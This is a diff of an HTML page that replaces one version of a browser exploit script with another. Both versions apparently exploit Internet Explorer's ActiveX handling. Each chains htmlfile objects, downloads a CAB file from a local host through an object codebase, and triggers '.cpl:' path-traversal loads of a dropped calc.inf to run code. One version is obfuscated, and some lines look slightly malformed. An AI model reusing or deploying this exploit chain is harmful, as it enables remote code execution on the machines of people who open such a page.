skipped 4 lines 5 5 <meta http-equiv="X-UA-Compatible" content="IE=11"> 6 6 </head> 7 7 <body> 8 - <script> 9 - function(){ 10 - try{ 11 - window['HTMLElement']['prototype']['appendChild']['call'](window['document']['body'], 12 - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')); 13 - }catch(_0x1c747c){ 14 - window['HTMLElement']['prototype']['appendChild']['call'](window['document']['documentElement'], 15 - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')); 16 - } 17 - iframeActxHtml1 = new window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentWindow']['ActiveXObject']('htmlfile'); 18 - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')['contentDocument']['open']()['close'](); 19 - try{ 20 - window['HTMLElement']['prototype']['removeChild']['call'](window['document']['body'], 21 - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')); 22 - }catch(_0x5afb73){ 23 - window['HTMLElement']['prototype']['removeChild']['call'](window['document']['documentElement'], 24 - window['Document']['prototype']['createElement']['call'](window['document'],'iframe')); 25 - } 26 - iframeActxHtml1['open']()['close'](); 27 - var iframeActxHtml2= iframeActxHtml1['Script']['ActiveXObject')]('htmlFile'); 28 - iframeActxHtml2['open']()['close'](); 29 - iframeActxHtml3 = iframeActxHtml2[('Script')]['ActiveXObject']('htmlFile'); 30 - iframeActxHtml3 [' open' ]()[' close' ](); 31 - var iframeActxHtml4 =new iframeActxHtml3 [' Script' ][( ' ActiveXObject' )] (' htmlFile' ); 32 - iframeActxHtml4 [' open' ]()[' close' ](); 33 - var actx_html_0=new ActiveXObject('htmlfile'), 34 - actx_html_1=new ActiveXObject('htmlfile'), 35 - actx_html_2=new ActiveXObject('htmlfile'), 36 - actx_html_3=new ActiveXObject('htmlfile'), 37 - actx_html_4 =new ActiveXObject(' htmlfile' ), 38 - actx_html_5 =new ActiveXObject(' htmlfile' ), 39 - xmlhttpreq1=new window['XMLHttpRequest'](), 40 - window['setTimeout']=window['setTimeout']; 41 - window['XMLHttpRequest']['prototype']['open']['call'](xmlhttpreq1,'GET','http://localhost/calc.cab',![]), 42 - window['XMLHttpRequest']['prototype']['send']['call'](xmlhttpreq1), 43 - iframeActxHtml4['Script']['document']['write']('&lt;body>'); 44 - var cabloadunpack=window['Document']['prototype']['createElement']['call'](iframeActxHtml4['Script']['document'],'object'); 45 - cabloadunpack['setAttribute']('codebase','http://localhost/calc.cab#version=5,0,0,0'); 46 - cabloadunpack['setAttribute']('classid','CLSID:b7771b25-4e74-4168-add9-04062d629d9a'), 47 - window['HTMLElement']['prototype']['appendChild']['call'](iframeActxHtml4['Script']['document']['body'],cabloadunpack), 48 - actx_html_0['Script']['location']='.cpl:123', 49 - actx_html_0['Script']['location']='.cpl:123', 50 - actx_html_0['Script']['location']='.cpl:123', 51 - actx_html_0['Script']['location']='.cpl:123', 52 - actx_html_0['Script']['location']='.cpl:123', 53 - actx_html_0['Script']['location']='.cpl:123', 54 - actx_html_0['Script']['location']='.cpl:123', 55 - actx_html_0 [' Script' ][' location' ]=' .cpl:123' , 56 - actx_html_0 [' Script' ][' location' ]=' .cpl:123' , 57 - actx_html_0['Script']['location']='.cpl:../../../AppData/Local/Temp/Low/calc.inf', 58 - actx_html_1['Script']['location']='.cpl:../../../AppData/Local/Temp/calc.inf', 59 - actx_html_2['Script']['location']='.cpl:../../../../AppData/Local/Temp/Low/calc.inf', 60 - actx_html_3['Script']['location']='.cpl:../../../../AppData/Local/Temp/calc.inf', 61 - actx_html_4['Script']['location']='.cpl:../../../../../Temp/Low/calc.inf', 62 - actx_html_3['Script']['location']='.cpl:../../../../../Temp/calc.inf', 63 - actx_html_3['Script']['location']='.cpl:../../Low/calc.inf', 64 - actx_html_3 [' Script' ][' location' ]=' .cpl:../../calc.inf' ; 65 - }(); 66 - </script> 8 + <script> 9 + function exploit () { 10 + var x = window["document"]; 11 + var then = window["Document"]["prototype"]["createElement"]; 12 + var _0x4d7c02 = window["Document"]["prototype"]["write"]; 13 + var PL$22 = window["HTMLElement"]["prototype"]["appendChild"]; 14 + var opfilter = window["HTMLElement"]["prototype"]["removeChild"]; 15 + var range = then["call"](x, "iframe"); 16 + try { 17 + PL$22["call"](x["body"], range); 18 + } catch (errx) { 19 + PL$22["call"](x["documentElement"], range); 20 + } 21 + var ACTIVEX = range["contentWindow"]["ActiveXObject"]; 22 + var view = new ACTIVEX("htmlfile"); 23 + range["contentDocument"]["open"]()["close"](); 24 + 25 + try { 26 + opfilter["call"](x["body"], range); 27 + } catch (err) { 28 + opfilter["call"](x["documentElement"], range); 29 + } 30 + view [" open" ]()[" close" ](); 31 + var mappedObj = new ( view [" Script" ][" ActiveXObject" ] )(" htmlFile" ); 32 + mappedObj [" open" ]()[" close" ](); 33 + var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile"); 34 + TokenType["open"]()["close"](); 35 + var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile"); 36 + model["open"]()["close"](); 37 + var iedom = new ActiveXObject(" htmlfile" ); 38 + var rp_test = new ActiveXObject(" htmlfile" ); 39 + var wmp_test = new ActiveXObject("htmlfile"); 40 + var doc = new ActiveXObject("htmlfile"); 41 + var a = new ActiveXObject("htmlfile"); 42 + var fake = new ActiveXObject("htmlfile"); 43 + var errors = window["XMLHttpRequest"]; 44 + var $node = new errors; 45 + var directiveProcessors = errors["prototype"]["open"]; 46 + var nodeTypeRender = errors["prototype"]["send"]; 47 + var newAttributes = window["setTimeout"]; 48 + directiveProcessors["call"]($node, "GET", "http://127.0.0.1/calc.cab", ![]); 49 + nodeTypeRender["call"]($node); 50 + model["Script"]["document"]["write"]("<body>"); 51 + var PL$41 = then["call"](model["Script"]["document"], "object"); 52 + PL$41["setAttribute"]("codebase", "http://127.0.0.1/calc.cab#version=5,0,0,0"); 53 + PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217"); 54 + PL$22["call"](model["Script"]["document"]["body"], PL$41); 55 + iedom [" Script" ][" location" ] = " .cpl:123" ; 56 + iedom [" Script" ][" location" ] = " .cpl:123" ; 57 + iedom["Script"]["location"] = ".cpl:123"; 58 + iedom["Script"]["location"] = ".cpl:123"; 59 + iedom["Script"]["location"] = ".cpl:123"; 60 + iedom["Script"]["location"] = ".cpl:123"; 61 + iedom["Script"]["location"] = ".cpl:123"; 62 + iedom["Script"]["location"] = ".cpl:123"; 63 + iedom["Script"]["location"] = ".cpl:123"; 64 + iedom [" Script" ][" location" ] = " .cpl:../../. . / AppData / Local / Temp / Low / calc.inf" ; 65 + rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/calc.inf"; 66 + wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/calc.inf"; 67 + doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/calc.inf"; 68 + a["Script"]["location"] = ".cpl:../../../../../Temp/Low/calc.inf"; 69 + doc["Script"]["location"] = ".cpl:../../../../../Temp/calc.inf"; 70 + doc["Script"]["location"] = ".cpl:../../Low/calc.inf"; 71 + doc["Script"]["location"] = ".cpl:../../calc.inf"; 72 + } 73 + exploit(); 74 + </script> 67 75 </body> 68 76 </html> 69 77